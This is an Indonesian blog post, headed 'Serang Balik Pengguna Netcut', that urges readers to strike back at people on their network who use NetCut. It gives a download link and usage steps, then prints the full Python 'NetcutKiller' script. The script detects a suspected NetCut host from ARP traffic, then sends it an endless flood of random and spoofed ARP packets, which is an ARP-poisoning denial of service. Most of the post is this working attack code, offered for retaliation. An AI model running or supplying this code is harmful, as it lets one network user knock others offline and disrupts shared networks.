Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.
- Harus sudah terdapat python compiler di komputer
- Download toolsnya disini: http://1337day.com/exploits/17338
- Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh:python netcutkiller.py eth0 A1:B2:C3:D4:E5:F6
Code exploitnya adalah sebagai berikut:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 | #!/usr/bin/env python #Exploit Title: Netcut Denial of Service Vulnerability #Author: MaYaSeVeN #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com) #Blog: http://mayaseven.blogspot.com #PoC: Video http://www.youtube.com/user/mayaseven #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png #Version: Netcut 2 #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266 #Tested on: Windows Xp, Windows 7 #Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf import commands,os,sys #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2] gw_ip = commands.getoutput("ip route list | grep default").split()[2] def protect(gw_ip,gw_mac): os.popen("arp -s %s %s" %(gw_ip,gw_mac)) print "Protected himself" def detect(): ans = sniff(filter='arp',timeout=7) target=[] for r in ans.res: target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) return target def preattack(gw_ip): num = [] count = 0 target = 0 temp = 0 print "Detecting..." d = detect() for i in range(len(d)): if d[i].split()[0] == "255.255.255.255": num.append(d.count(d[i])) if d.count(d[i]) > count: count = d.count(d[i]) target = i if d[i].split()[0] == gw_ip: temp += 1 if len(d) < 7: print "[-] No one use Netcut or try again" exit() if len(num)*7 < temp: num[:] = [] count = 0 result = float(temp)/len(d)*100 for j in range(len(d)): if d[i].split()[0] == gw_ip: num.append(d.count(d[j])) if d.count(d[i]) > count: count = d.count(d[i]) target = i num.reverse() result = float(temp)/len(d)*100 print target else: num.reverse() result = float(num[0]+temp)/len(d)*100 print "There is a possibility that " + str(result) + "%" if result>= 50: target_mac = d[target].split()[1] target_ip = d[target].split()[2] print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac) attack(target_mac,target_ip,gw_ip) else: print "[-] No one use Netcut or try again" def attack(target_mac,target_ip,gw_ip): print "[+]Counter Attack !!!" e = Ether(dst="FF:FF:FF:FF:FF:FF") while 1: a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1) p = e/a/Padding("\x00"*18) sendp(p,verbose=0) a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2) p1 = e/a1/Padding("\x00"*18) sendp(p1,verbose=0) if __name__ == '__main__': os.system("clear") print "###################################################" print " __ __ __ __ _____ __ __ _ _" print "| \/ | \ \ / / / ____| \ \ / / | \ | |" print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |" print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |" print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |" print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|" print " " print "###################################################" print "" print "http://mayaseven.blogspot.com" print "" if len(sys.argv) == 2 or len(sys.argv) == 3: if len(sys.argv) == 2: conf.iface=sys.argv[1] preattack(gw_ip) if len(sys.argv) == 3: conf.iface=sys.argv[1] gw_mac = sys.argv[2] protect(gw_ip,gw_mac) preattack(gw_ip) else: print '''Mode: 1.)Attack only Usage: NetcutKiller <Interface> e.g. NetcutKiller.py wlan0 2.)Attack with protect himself Usage: NetcutKiller <Interface> <MAC_Gateway> e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF ''' # 1337day.com [2012-01-04] |
Untuk lebih detailnya, simak video berikut:
0 komentar on Serang Balik Pengguna Netcut :
Post a Comment and Don't Spam!